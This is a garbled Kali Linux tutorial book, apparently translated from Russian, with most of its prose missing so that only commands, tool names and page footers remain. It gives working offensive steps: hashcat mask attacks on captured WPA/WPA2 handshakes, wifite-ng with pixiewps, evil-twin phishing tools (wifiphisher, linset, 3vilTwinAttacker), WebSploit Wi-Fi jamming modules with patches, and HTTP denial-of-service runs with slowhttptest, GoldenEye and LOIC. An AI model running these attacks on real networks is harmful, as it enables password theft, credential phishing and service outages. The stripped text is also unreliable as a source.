AMD APP SDK Kali Linux
CAL++ Kali Linux
Pyrit

Hashcat WPA WPA2


Pyrit , WPA2 WPA.
Hashcat WPA2 WPA?
?
Hashcat
. , , .
Hashcat
WPA2 WPA.

WebWare.biz 147
Kali Linux 2.0


1| ?l = abcdefghijklmnopqrstuvwxyz
2| ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
3| ?d = 0123456789
4| ?s = !#$%&'()*+,-./:;?@[\]^_`{|}~
5| ?a = ?l?u?d?s
6| ?b = 0x00 - 0xff


, 12345678.
?d?d?d?d?d?d?d?d
, 12345678
23456789 01567891. , .

, ABCFEFGH LKHJHIOP ZBTGYHQS . .,
:
?u?u?u?u?u?u?u?u
.

, : abcdefgh dfghpoiu
bnmiopty . ., :
?l?l?l?l?l?l?l?l
. ,
.

, a1b2c3d4 p9o8i7u6 n4j2k5l6 . .
( ), :
?l?d?l?d?l?d?l?d

, A1B2C3D4 P9O8I7U6 N4J2K5L6 . .
( ), :
?u?d?u?d?u?d?u?d
, ,

,
:

WebWare.biz 148
Kali Linux 2.0

?a?a?a?a?a?a?a?a
: ?a , .
, .
.

- ,
.
. .
, ,
abc, - .
:
abc?l?l?l?l?l
abc?u?u?u?u?u
abc?d?d?d?d?d
abc?l?u??d??d?l
abc?d?d?l?u?l
- , 125 .
.
cudaHashcat oclHashcat Hashcat Kali Linux WPA2 WPA .
,
. .
, , ,
, ,
.
: Abcde123
:
?u?l?l?l?l?d?d?d
.

Hashcat
.
:
1| --custom-charset1=CS
2| --custom-charset2=CS
3| --custom-charset3=CS
4| --custom-charset4=CS
CS . CS
, . .
, , .

WebWare.biz 149
Kali Linux 2.0

: -1, -2, -3 -4.



hashcat ( .hcchr,
/, ).
:


,
abcdefghijklmnopqrstuvwxyz0123456789 (aka lalpha-numeric):
1| -1 abcdefghijklmnopqrstuvwxyz0123456789
2| -1 abcdefghijklmnopqrstuvwxyz?d
3| -1 ?l0123456789
4| -1 ?l?d
5| -1 loweralpha_numeric.hcchr # , +
(abcdefghijklmnopqrstuvwxyz0123456789)
, 0123456789abcdef:
-1 ?dabcdef
7- ascii charset (aka
mixalpha-numeric-all-space):
-1 ?l?d?s?u
(-1)
, :
-1 charsets/special/Russian/ru_ISO-8859-5-special.hcchr
Kali Linux
.hcchr :
1| tree /usr/share/maskprocessor/charsets/
:
1| tree /usr/share/hashcat/charsets/
: abc, 8 ,
.
, :
, ,
:
-1 ?l?d?u
:
abc?1?1?1?1?1
, , 1. l .
. ()
. , ,

WebWare.biz 150
Kali Linux 2.0

Wifi WPA2 WPA pyrit cowpatty Kali


Linux. ,
.
.cap wpaclean
.cap ,
Hashcat (cudaHashcat oclHashcat).
.cap Kali Linux.
1| wpaclean <out.cap> <in.cap>
, , , ,
<out.cap> <in.cap>. , <in.cap> <out.cap>.
, .
:
1| wpaclean hs/out.cap hs/Narasu_3E-83-E7-E9-2B-8D.cap

.cap .hccap
, Hashcat (cudaHashcat
oclHashcat).
.hccap aircrack-ng
-J
1| aircrack-ng <out.cap> -J <out.hccap>
-J J j.
:
1| aircrack-ng hs/out.cap -J hs/out

WPA2 WPA Hashcat


Hashcat (cudaHashcat oclHashcat) .
:



- , Rockyou.
, / ..
, WPA2
WPA. MD5, phpBB,
MySQL SHA1 Hashcat Kali Linux. :
1| hashcat --help | grep WPA
.. 2500.

WebWare.biz 151
Kali Linux 2.0

:
1| hashcat -m 2500 /root/hs/out.hccap /root/rockyou.txt
. , :
1| oclHashcat --force -m 2500 /root/hs/out.hccap /root/rockyou.txt
oclHashcat.
, cudaHashcat, :
1| cudaHashcat -m 2500 /root/hs/out.hccap /root/rockyou.txt
, .
. ,
.
, , Pyrit -
cudaHashcat oclHashcat Hashcat.
, . ,
MD5, phpBB, MySQL SHA1 Hashcat Kali
Linux .


.
.
WPA WPA2 Hashcat (cudaHashcat oclHashcat)
:
1| hashcat -m 2500 -a 3 capture.hccap ?d?d?d?d?d?d?d?d

-m = 2500 WPA2 WPA.


-a = 3 ( ).
capture.hccap = .cap.
wpaclean aircrack-ng.
?d?d?d?d?d?d?d?d = , d = . ,
, , 78964352 12345678 ..
, .
, .
,
. , webware-1.hcmask.
.
/usr/share/oclhashcat/masks/webware-1.hcmask.
, , oclHashcat
:
1| ls /usr/share/oclhashcat/masks/

WebWare.biz 152
Kali Linux 2.0

,
:
1| cudahashcat -m 2500 -a 3 /root/hs/out.hccap /usr/share/oclhashcat/masks/webware-
1.hcmask

.hcmask file
.hcmask :
1| tail -10 /usr/share/oclhashcat/masks/8char-1l-1u-1d-1s-compliant.hcmask
Hashcat (cudaHashcat
oclHashcat) .

Hashcat (cudaHashcat oclHashcat) .
, Hashcat.
, . . /root
1| cat hashcat.pot

. ,
hashcat.net, .
.
, :
, , , ,
, .
( ),
WebWare.biz. ,
!

23. Wifite Pixiewps


- ,
19. Kali Linux USB Wi-Fi

Pixiewps. :
1. pixie dust attack
2. Pixiewps Wiire
3. Pixiewps Reaver (t6x)
4. Reaver (t6x) Pixiewps Pixiewps
Kali Linux
5. Wifite Pixiewps

WebWare.biz 153
Kali Linux 2.0

, Pixiewps,
.
, Wifite Pixiewps
Kali Linux. ,
. .
https://github.com/aanarchyy/wifite-mod-pixiewps
, (wifite-ng),
.
(, Kali Linux SSH, ,
.
. ,
:
1| wget --output-document=/usr/bin/wifite-ng
https://raw.githubusercontent.com/aanarchyy/wifite-mod-pixiewps/master/wifite-ng
:
1| chmod +x /usr/bin/wifite-ng
!
:
1| wifite-ng


1| -pto <sec> pixiewps, 660
2| -ponly pixiewps M3
3| -pnopsk reaver
4| -paddto <sec> n ,
30
5| -update wifite
6| -endless ,


Kali Linux. Kali .
Pixiewps Wiire

reaver-wps-fork-t6x t6x


pixiewps, reaver,
.
.

WebWare.biz 154
Kali Linux 2.0


.
(
).
(, , ,
. .).

,
pixiewps
reaver github
mdk3
.

24. Wi-Fi : ,
Kali Linux
- ,
19. Kali Linux USB Wi-Fi

WebWare.biz 155
Kali Linux 2.0

Kali Linux ,
, . Kali
,
.
, ,
. ,
.
.
(Wi-Fi). ,
.
,
. .
, . . .
Kali?,
: .
:
;
;
;
()
;
/ /
,
.
( ) ,
,
. ,
. , ,
.
,
.
:
1| cd ~
2| mkdir opt

wifiphisher
: https://github.com/sophron/wifiphisher
Wifiphisher WiFi
.
. ..
.
WPA/WPA2.
Wifiphisher Kali Linux MIT .
WebWare.biz 156
Kali Linux 2.0

, :
1. . Wifiphisher
wifi
(deauth)
, .
2. . Wifiphisher
.
, .
NAT/DHCP . , -
.
--.
3.
. wifiphisher -
HTTP & HTTPS .
, wifiphisher ,
, , , ,
WPA .

wifiphisher
, .
hostapd, , , :
1| apt-get install hostapd

wifiphisher
1| cd ~/opt
2| git clone https://github.com/sophron/wifiphisher
3| cd wifiphisher/
:
1| python wifiphisher.py

WebWare.biz 157
Kali Linux 2.0

WebWare.biz 158
Kali Linux 2.0

wifiphisher
,
,
waidps. .

waidps
: https://github.com/SYWorks/waidps
waidps , .

.
.
.
.
, waidps
. .
WAIDPS , Python
Linux. , Kali,
/ . .. Kali
Linux .
, ( )
, ( WEP/WPA/WPS)
( ). ,
WiFi .
:
MAC SSID
.
WAIDS , ,
,
. .
, , .
WAIDS (
, WIDS):
Association / Authentication flooding
,
WPA
WEP ARP

WEP chopchop
WPS Reaver,
Bully ..
- (Evil-Twin)

WebWare.biz 159
Kali Linux 2.0

waidps
1| cd ~/opt
2| git clone https://github.com/SYWorks/waidps
3| cd waidps
4| python waidps.py

WebWare.biz 160
Kali Linux 2.0

Chopchop:

Chopchop :

WebWare.biz 161
Kali Linux 2.0

Chopchop :

3vilTwinAttacker
: https://github.com/P0cL4bs/3vilTwinAttacker
Wi-Fi,
, .
:
Kali linux.
Ettercap.
Sslstrip.
Airbase-ng aircrack-ng.
DHCP.
Nmap.
3vilTwinAttacker
1| cd ~/opt
2| git clone https://github.com/P0cL4bs/3vilTwinAttacker
3| cd 3vilTwinAttacker
4| chmod +x install.sh

WebWare.biz 162
Kali Linux 2.0

5| ./install.sh --install
:
1| python 3vilTwin-Attacker.py
( Kali Linux):
1| python /usr/share/3vilTwinAttacker/3vilTwin-Attacker.py
[ DHCP Debian ]
Ubuntu:
1| $ sudo apt-get install isc-dhcp-server
Kali linux:
1| apt-get install isc-dhcp-server
[ DHCP redhat ]
Fedora:
1| $ sudo yum install dhcp

WebWare.biz 163
Kali Linux 2.0

linset
: https://github.com/vk496/linset
linset " " (Evil Twin Attack).

linset
.
Kali Linux ( ).
. :
1| apt-get install isc-dhcp-server lighttpd macchanger php5-cgi macchanger-gtk

. linset , ,
.
:
1| cd ~/opt
2| git clone https://github.com/vk496/linset
3| cd linset
4| chmod +x linset ./linset

WebWare.biz 164
Kali Linux 2.0

linset


( )
-
,
DHCP
DNS
-
,
, , -

,

25. Router Scan by StasM Kali Linux (


Wi-Fi )
, Router Scan Stas'M !
.
:
, , -
(, .)


,
, . , , -,
Wi-Fi, . .
, , ,
. .
,
Linux. .

,
- Linux. , . .
. : nmap (
) + curl ( ) + grep
( ( )
/
).

WebWare.biz 165
Kali Linux 2.0

,
1000 Wi-Fi. :
PHP, ,
. ..

.
, . ,
, , .
, .
, , ( nmap,
PHP) ,
. ,
Stas'M,
curl.

WebWare.biz 166
Kali Linux 2.0

Router Scan Stas'M. !


, Wi-Fi
.
Windows, , ,
.
Linux Router Scan Stas'M
Wine. Kali Linux.

Wine Kali Linux


, Kali 2.0, " Wine Kali Linux
2.0".
Wine Kali Linux, ,
. , , -
, .
:
1| dpkg --add-architecture i386
2| apt-get update
3| apt-get install wine-bin:i386

Router Scan Stas M (http://stascorp.com/load/1-1-0-56),


( ), RouterScan.exe,
Wine,
Windows.
Router Scan Stas'M Linux (
):

WebWare.biz 167
Kali Linux 2.0

- :
Wi-Fi -
;
Wi-Fi ( ),
IP , , IP - .
,
IP, IP .
- IP ipgeobase.ru,
:
1| curl -s 'URL' | grep -o -E '[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3} - [0-9]{1,3}.[0-9]{1,3}.[0-
9]{1,3}.[0-9]{1,3}' > diap_ip.txt
'URL' ipgeobase.ru, .

26. Wifi_Jammer Wifi_DoS WebSploit


Wifi_Jammer ( )
Wifi_Jammer
Wifi_DoS WebSploit,
, . , WebWare.biz,
, , ,
aircrack-ng.
:
1| set mon wlan0mon

WebWare.biz 168
Kali Linux 2.0

, :

,
wlan .
Wifi_Jammer, Wifi_DoS.
, ,
( ):
1| cat /usr/share/websploit/modules/wifi_jammer.py >
/usr/share/websploit/modules/wifi_jammer.py.bak cat
/usr/share/websploit/modules/wifi_jammer.py >
/usr/share/websploit/modules/wifi_jammer.py.bak
/usr/share/websploit/modules/wifi_jammer.py
1| vim /usr/share/websploit/modules/wifi_jammer.py
:
1| elif com[0:7] =='set mon':
2| options[3] = com[8:12]
( ,
):
1| elif com[0:7] =='set mon':
2| options[3] = com[8:]

WebWare.biz 169
Kali Linux 2.0

WebSploit Wifi_Jammer.
, set mon wlan0mon.

Wifi_DoS (
)
Wifi_DoS .
:
1| Traceback (most recent call last):
2| File "/usr/bin/websploit", line 160, in <module>
3| start()
4| File "/usr/bin/websploit", line 158, in start
5| main()
6| File "/usr/bin/websploit", line 132, in main
7| main()

WebWare.biz 170
Kali Linux 2.0

8| File "/usr/bin/websploit", line 122, in main


9| wifi_dos.wifi_dos()
10| File "/usr/share/websploit/modules/wifi_dos.py", line 31, in wifi_dos
11| wifi_dos()
12| File "/usr/share/websploit/modules/wifi_dos.py", line 27, in wifi_dos
13| wifi_dos()
14| File "/usr/share/websploit/modules/wifi_dos.py", line 39, in wifi_dos
15| wifi_dos()
16| File "/usr/share/websploit/modules/wifi_dos.py", line 76, in wifi_dos
17| os.chdir("temp")
18| OSError: [Errno 2] No such file or directory: 'temp'

Wifi_Jammer. ..
, , . Wifi_DoS.
1| mkdir /root/temp && touch /root/temp/blacklist
, Wifi_DoS.
WebSploit :
1| cd ~ && websploit
, ,
:
1| cat /usr/share/websploit/modules/wifi_dos.py >
/usr/share/websploit/modules/wifi_dos.py.bak
/usr/share/websploit/modules/wifi_dos.py
1| vim /usr/share/websploit/modules/wifi_dos.py
:
1| elif com[0:7] =='set mon':
2| options[3] = com[8:12]
:
1| elif com[0:7] =='set mon':
2| options[3] = com[8:]
:
1| elif com[0:3] =='run':
2| cmd_0 = "airmon-ng stop " + options[3]
:
1| elif com[0:3] =='run':
2| cmd_0 = "airmon-ng stop " + options[0]
.
WebWare.biz 171
Kali Linux 2.0

27. - Wifi_Jammer:
Wi-Fi
- ,
19. Kali Linux USB Wi-Fi

Wi-Fi
( )
(Wi-Fi): , ,
WPS . ,
? , , ,
DoS Wi-Fi. ,
.
Wi-Fi, -
,
.

Wifi_Jammer
Aircrack-ng .
, Wifi_Jammer .
. 26. Wifi_Jammer Wifi_DoS
WebSploit. Wifi_Jammer,
.
:
1| airmon-ng

: airmon-ng start _. :
1| airmon-ng start wlan0

WebWare.biz 172
Kali Linux 2.0

, ( ):
1| Found 2 processes that could cause trouble.
2| If airodump-ng, aireplay-ng or airtun-ng stops working after
3| a short period of time, you may want to kill (some of) them!
4| PID Name
5| 3036 NetworkManager
6| 3187 dhclient

,
airodump-ng, aireplay-ng airtun-ng
, . (
PID):
1| kill 3036
2| kill 3187

:
1| airodump-ng wlan0mon

WebWare.biz 173
Kali Linux 2.0

.
WebSploit
1| websploit
wifi_jammer:
1| wsf > use wifi/wifi_jammer

WebWare.biz 174
Kali Linux 2.0

wifi_jammer,
, . ,
.
:
1| wsf:Wifi_Jammer > show options
essid, bssid, channel mon.
airodump-ng.
1| wsf:Wifi_Jammer > set essid Mial
2| wsf:Wifi_Jammer > set bssid 20:25:64:16:58:8C
3| wsf:Wifi_Jammer > set channel 11
:
1| wsf:Wifi_Jammer > set mon wlan0mon
, ,
wlan0mon.
run:
1| wsf:Wifi_Jammer > run
. ,
Wi-Fi.
airodump-ng wlan0mon.
PWR. 40.
PWR 0
. Wi-Fi .

, ,
, .

WebWare.biz 175
Kali Linux 2.0

Wi-Fi
, ,
. ,
.
,
.
.
, . .
.
.
.
.

28. - Wifi_DoS:
Wi-Fi
- ,
19. Kali Linux USB Wi-Fi
Wifi_DoS Wifi_Jammer,
(- Wifi_Jammer: Wi-Fi).
, , . ,
- , ,
.
DoS-
Wi-Fi .
, .

.

WebWare.biz 176
Kali Linux 2.0

Wifi_DoS
Wifi_DoS,
-? , - ,
. ,
. Wifi_Jammer Wifi_DoS
WebSploit, .

, DoS- .
1| airmon-ng
2| airmon-ng start wlan0

:
1| airodump-ng wlan0mon

WebSploit :
1| cd ~ && websploit

wifi_dos:
1| use wifi/wifi_dos

:
1| wsf:Wifi_Dos > set essid Mial
2| wsf:Wifi_Dos > set bssid 20:25:64:16:58:8C
3| wsf:Wifi_Dos > set channel 11

, :
1| wsf:Wifi_Dos > set interface wlan0
2| wsf:Wifi_Jammer > set mon wlan0mon

. interface wlan0 - ,
airmon-ng. mon wlan0mon .

.., , :

WebWare.biz 177
Kali Linux 2.0

:
1| wsf:Wifi_Jammer > run
DoS Wi-Fi , :

WebWare.biz 178
Kali Linux 2.0

4. -
29. - (DoS -) SlowHTTPTest Kali
Linux: slowloris, slow body slow read

- ,
, () .
, mod_evasive
DoS .
-:
- Apache mod_security mod_evasive
CentOS
DoS:
- Low Orbit Ion Cannon (LOIC)
- (DoS -) SlowHTTPTest Kali Linux: slowloris, slow body
slow read ( )
SlowHTTPTest ,
(DoS) .
Linux, OSX Cygwin (Unix-
Microsoft Windows).
DoS
, Slowloris, slow body, Slow Read (
TCP), ,
Apache Range Header,
.
Slowloris Slow HTTP POST DoS , HTTP, ,
,
. HTTP ,

WebWare.biz 179
Kali Linux 2.0

, .
, .
HTTP,
HTTP .
Slow Read , slowloris slow body,
, HTTP ,
.

SlowHTTPTest
Kali Linux
Kali Linux apt-get .. ( !)
1| apt-get install slowhttptest

Linux
, . .
, , , .
:
SlowHTTPTest, :
1| (t=`curl -s https://code.google.com/p/slowhttptest/downloads/list | grep -E -o
'//slowhttptest.googlecode.com/files/slowhttptest(.)*.tar.gz" onclick="' | sed 's/\/\///' |
sed 's/" onclick="//' | head -1`; curl -s $t -o slowhttptest-last.tar.gz) && tar -xzvf
slowhttptest-last.tar.gz && cd slowhttptest-*
.. , .
WebWare.biz 180
Kali Linux 2.0

, , .
1| $ tar -xzvf slowhttptest-x.x.tar.gz
2| $ cd slowhttptest-x.x
3| $ ./configure --prefix=PREFIX
4| $ make
5| $ sudo make install
PREFIX , slowhttptest
.
libssl-dev .
.
Mac OS X
Homebrew:
1| brew update && brew install slowhttptest

Linux
, slowhttptest
( Kali Linux).
SlowHTTPTest
slowhttptest , .
.
slow body a.k.a R-U-Dead-Yet,
:
1| slowhttptest -c 1000 -B -i 110 -r 200 -s 8192 -t FAKEVERB -u http://192.168.1.37/info.php -
x 10 -p 3
, :
1| lowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u
http://192.168.1.37/info.php -x 10 -p 3

WebWare.biz 181
Kali Linux 2.0

, ,
. , .
,
, .

slow headers a.k.a. Slowloris:


1| slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u http://192.168.1.37/info.php -x 24 -p 3
, :
1| slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u
http://192.168.1.37/info.php -x 24 -p 3
: :

WebWare.biz 182
Kali Linux 2.0

Slow Read .
x.x.x.x:8080 , - IP
:
1| slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://192.168.1.37/info.php -p 5 -l
350 -e x.x.x.x:8080
:

WebWare.biz 183
Kali Linux 2.0

SlowHTTPTest
,
5 ,
( 1), ( 4).
-g CSV, HTML,
Google Chart.

,

.
CSV
, MS Excel, iWork Numbers Google Docs.
, ,
, :
Hit test time limit ,
-l
No open connections left
Cannot establish connection N
, N -i, 10 ( ).
.

WebWare.biz 184
Kali Linux 2.0

Connection refused (
? )
Cancelled by user Ctrl-C SIGINT -

Unexpected error .
SlowHTTPTest
, .
,
. .

, http://192.168.1.37 1000 .
1| slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u
http://192.168.1.37/info.php -x 10 -p 3

WebWare.biz 185
Kali Linux 2.0

-
1| root@WebWare-Debian:~# netstat | grep http | wc -l
2| 111

, . . SSH
. http 111 10
.
(
VPS).
DoS
DoS , ,
,
( ),
DoS , ,
SlowHTTPTest
.
, ,
-
, . ,
DoS IP () .
. ,
-
.

Windows, Linux Mac. DoS


, GoldenEye, hping3 -,
. DoS (,
- ). ,
, -,
.

30. - : DoS - Kali Linux GoldenEye


WebWare.biz
DoS, HTTP, -
. GoldenEye , ,
30 , ,

WebWare.biz 186
Kali Linux 2.0

. ,
WAF, IDS.
- .
iptables/
.
GoldenEye:
: GoldenEye
: Jan Seidl
-: http://wroot.org/
GoldenEye:
1.
.
2. GoldenEye
!
3. GoldenEye HTTP DoS.
4. : HTTP Keep Alive + NoCache
DoS DDoS
DoS . DDoS.
DoS DDoS :
1. DoS DDoS
2. DoS DDoS
3. DoS DDoS
DoS DDoS
DoS DDoS , Windows,
Apache, OpenBSD
.
DoS DDoS
DoS DDoS .
Synflood, Ping of Death .
DoS DDoS
ICMP-, UDP- ,
.
DoS DDoS . ,
DoS . ( )
DDoS . , ,
, . . /.

WebWare.biz 187
Kali Linux 2.0

GoldenEye
, , ~/opt.
, :
1| mkdir opt
2| cd opt

,
GoldenEye, GoldenEye (
):
1| mkdir GoldenEye && cd GoldenEye && wget
https://github.com/jseidl/GoldenEye/archive/master.zip && unzip master.zip && cd
GoldenEye-master/ && ./goldeneye.py

, .
GoldenEye, :
1| root@WebWare-Kali:~/opt# mkdir GoldenEye
2| root@WebWare-Kali:~/opt# cd GoldenEye
3| root@WebWare-Kali:~/opt/GoldenEye# wget
https://github.com/jseidl/GoldenEye/archive/master.zip

master.zip.
1| unzip master.zip

WebWare.biz 188
Kali Linux 2.0

GoldenEye-master,
:
1| ls
2| cd GoldenEye-master/
3| ls

GoldenEye -
, :
1| ./goldeneye.py
:

WebWare.biz 189
Kali Linux 2.0


.
.
: ( )
. ,
.
.
,
.
:
1| root@WebWare-Kali:~/opt/GoldenEye/GoldenEye-master# ./goldeneye.py
http://www.goldeneyetestsite.com/
()
1| sudo ./goldeneye.py http://www.goldeneyetestsite.com/
()
1| python goldeneye.py http://www.goldeneyetestsite.com/
, , .

GoldenEye:
top:

.. , ,
350 .

1| ./goldeneye.py http://192.168.1.37/info.php

WebWare.biz 190
Kali Linux 2.0

, - ,
,
.

, (
-, ).
GoldenEye
:
1| cat /var/log/apache2/access.log | grep -E '192.168.1.55'
grep -E '192.168.1.55',
, .
:
1| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET
/info.php?vySSDx=tG1rmfX4HbYXBm&CKVuvV=JLoK&nHc8x=0x5YKQtvHs0HWS68
HTTP/1.1" 200 69504 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_3_3)
AppleWebKit/535.6 (KHTML, like Gecko) Version/6.0.5 Safari/535.17"

WebWare.biz 191
Kali Linux 2.0

2| 192.168.1.55 - - [18/Jun/2015:17:06:48 +0700] "GET


/info.php?dC1FyXpw=hB6Oh&rjcf74A=YVA&YUtUXuDo2s=2pLY7nlq&SjyqoF=wUIx8Aq&tXkr
fJRw=LsgED HTTP/1.1" 200 69504 "http://www.baidu.com/k1IkNXv" "Mozilla/5.0
(Macintosh; Intel Mac OS X 11_0_4) AppleWebKit/536.12 (KHTML, like Gecko)
Chrome/10.0.623.89 Safari/536.26"
3| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET
/info.php?0Nk7p=kSf&1eVF8PNy=UpDtxpDmJE2Fbx6&lPS=53T0AUI6Xu&5EbHY=scv1yBq8O
6Y&JJthAkQqqk=HUEQBD5ONbAMxVlWHxai HTTP/1.1" 200 69504 "-" "Mozilla/5.0
(Windows NT 5.1; WOW64) Gecko/20021304 Firefox/12.0"
4| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?SAQMIx5Pl=VWGEFj3q8N0
HTTP/1.1" 200 69504
"http://www.google.com/gCqMk2Q05?DxQe=67gW4HUd3iTKCu2qWSJ&ngWHMmS1=5Xyo
Gh6q2sVlyHBdK&bl185B=anwKamnu2xK&RpI=HA0wNexUytc&uOqLV=6TNbGepqbnr&uu2fj
tL63=u5lnA701na4cYYH0yN&TOY066XT=3WJQhmtXRyCo46HnbXY1" "Mozilla/5.0 (Linux
x86_64; X11) Gecko/20010905 Firefox/17.0"
5| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET
/info.php?jA5Kw=fwtSMfaPQ8XtCaK&Y0fBbDfSXd=8Jm5hqt&xPC=1qwBHvMDy7gl
HTTP/1.1" 200 69504 "-" "Mozilla/5.0 (Windows NT 5.1; WOW64) Gecko/20011709
Firefox/23.0"
6| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET
/info.php?t2U0aYjxm=q21n4BARB1&qxI1=cTw&XjGPpG=W3AAWvebbW HTTP/1.1" 200
69504 "http://www.baidu.com/bQnoS7ULAY" "Mozilla/5.0 (Windows NT.6.2; Win64; x64)
AppleWebKit/536.10 (KHTML, like Gecko) Chrome/18.0.1844.44 Safari/537.21"
7| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET
/info.php?nkIkop=6pivICjNb6&U3Y=dDlbGnW3feTEXCm&aH2JLMl=sGmkpeSLnTtXahs7agi&
8htjBss=DFuXcUiJ5G5Fu7c HTTP/1.1" 200 69504 "-" "Mozilla/5.0 (compatible; MSIE 10.0;
Macintosh; .NET CLR 3.0.8867; Intel Mac OS X 11_6_2)"
8| 192.168.1.55 - - [18/Jun/2015:17:06:48 +0700] "GET
/info.php?p6P23Hj=IcVgaSIUoVTanmFIDan&WWml82r3D=TCY8rta5YrwVsLJmrM HTTP/1.1"
200 69504
"http://www.baidu.com/fWaBwllK?aNP85MesWv=VhL6v32qtwyj&6CLwEBed=Eb73YTA24o
YXmLk2w&Uy3wv=4pvNH8y&Jvirs=RJ4hKfRa&HyIYt8gtP=CHjm8OJaOP2djoQS&rm7bH=rukJ
4726B14D3XOxDwJ6&QBkOD3=33qpPxVM3ih76MaSgnT&s7gO=3WrX3Vd&Vsh=A13d"
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_4_1) AppleWebKit/536.10 (KHTML, like Gecko)
Chrome/15.0.1172.45 Safari/535.15"
9| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET
/info.php?so64O=2GhoHQaFy&DSmxwEWk=tYxV&y1C7mM=kQbuxco5oJfLPocGLl&kbItk4Rl
j=LjVhrLgelmtLYDuldfF HTTP/1.1" 200 69504
"http://192.168.1.37/uxNqvi6EnN?cAyrBjvKc=OsSGuqs&rrlLD=2bKFfSyTf" "Mozilla/5.0
(Windows; U; MSIE 10.0; Windows NT 5.1; .NET CLR 2.2.16303; Win64; x64)"
10| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET
/info.php?EXRbe03wp=fEBV5exjikcr8oNbEkmN&vpg8wYXv=DMGpYP1RMBUglSjbv4g&55prJ
=fY78WvDU3vW7GaoW4etN&JWEFmlYFU=yFyBEk7 HTTP/1.1" 200 69504 "-" "Mozilla/5.0
(Windows; U; MSIE 8.0; Linux x86_64; .NET CLR 1.0.1395; X11)"
11| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET
/info.php?7xIRdP0=8mjyacN&kEd2MwYtJ=bWhJvAH3A1H&xWe7vp6nH=faGl3PGJ4xAf&dSn
j5CW=wOBRfkLbMrEWdmMFvov&xWPL3sYb=WN0yYPXu HTTP/1.1" 200 69504 "-"
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_0) Gecko/20062612 Firefox/18.0"

WebWare.biz 192
Kali Linux 2.0

12| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?lVn80y605=IDRbDmoiDyNBu


HTTP/1.1" 200 69504 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_4) Gecko/20052008
Firefox/18.0"
13| 192.168.1.55 - - [18/Jun/2015:17:06:52 +0700] "GET
/info.php?mAthtfI=c4QdAopYyQGAsJAl0XUH HTTP/1.1" 200 69504
"http://www.yandex.com/jbOJRnhpii?fW4YmYLq=6A6f8qyxLRk6" "Mozilla/5.0 (Linux i386;
X11) AppleWebKit/536.27 (KHTML, like Gecko) Version/4.1.4 Safari/537.21"
14| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?1nwS7r=g6qpYcfOre
HTTP/1.1" 200 69504 "-" "Mozilla/5.0 (Linux i386; X11) Gecko/20053002 Firefox/15.0"
15| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET
/info.php?00iHfl2=CGhueehx3DqR32D&MnPMIcqiTN=HcIR&GFgFaO=IJL HTTP/1.1" 200
69504 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_3_3) AppleWebKit/535.29 (KHTML,
like Gecko) Chrome/19.0.1233.51 Safari/536.18"
16| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?Ml1k=DFVW0F7 HTTP/1.1"
200 69504 "-" "Mozilla/5.0 (Linux i386; X11) AppleWebKit/537.1 (KHTML, like Gecko)
Chrome/8.0.1320.86 Safari/535.21"
17| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET
/info.php?khUn=xnRp0gXjlF&bl8TpeXEF5=28W&wPkB=cnOPTgwOpPGC&12cnFT6b=XNDSX
FPdtraDsR&0FqigAn62=Kl4Y7pj2e7lj0nGoGN HTTP/1.1" 200 69504 "-" "Mozilla/5.0
(Windows NT.6.2; Win64; x64) AppleWebKit/537.3 (KHTML, like Gecko) Version/5.1.2
Safari/536.32"

( , )
, GET
, , Bing,
Baidu, Yandex .
, - ?
, URL, Referrer
200 OK. ? .

WebWare.biz 193
Kali Linux 2.0

, ,
, IP ( IP
?) (Firefox, Chrome, MSIE, Safari . .),
(Mac, Linux, Windows ..)
. , URL ,
- ,
(, Apache worker/socket).
- X
IP / ,

(HTTP 503 ). ,
proxy/VPN .
IP :
1| root@kali:~/GoldenEye/GoldenEye-master# ./goldeneye.py
http://www.goldeneyetestsite.com/ -w 10 -s 10 -m random
:
-w = 10
-s = 10
-m = , GET POST
DoS!
Google Analytics GoldenEye
, , -
. , Google Analytics
( IP,
Google ,
). :
Google, . .
.
Google , -
Google.
.
/ GoldenEye
, Apache:
1. IP ( 300 IP Apache)
2. IP
3. KeepAlive Connection Timeout (
300)
4. , .
,
.
5. Web application Firewall (WAF).

WebWare.biz 194
Kali Linux 2.0

6.
.
7. NGINX Node.js .

GoldenEye ( ) HTTP Flooder .


, NoCache KeepAlive GoldenEye
. ,
, .
,
- ( ), -
-, GET POST .
. WAF
.

31. - Low Orbit Ion Cannon (LOIC)


Low Orbit Ion Cannon (LOIC)
Low Orbit Ion Cannon (LOIC) - , ,
, .
.
, ,
- .
Anonymous, DDoS
-,
. , ,
, - ; ,

LOIC .
Low Orbit Ion Cannon (LOIC) Windows
Windows .
. !

WebWare.biz 195
Kali Linux 2.0

Low Orbit Ion Cannon (LOIC) Linux


LOIC Linux, , ,
Kali Linux.
LOIC :
1| apt-get update
2| aptitude install git-core monodevelop
3| apt-get install mono-gmcs

, , Kali Linux, .
Ubuntu, Linux Mint ( Debian),
:
1| sudo apt-get install mono-complete
, , :
1| cd ./Desktop
loic, :
1| mkdir loic

WebWare.biz 196
Kali Linux 2.0

, :
1| cd ./loic
:
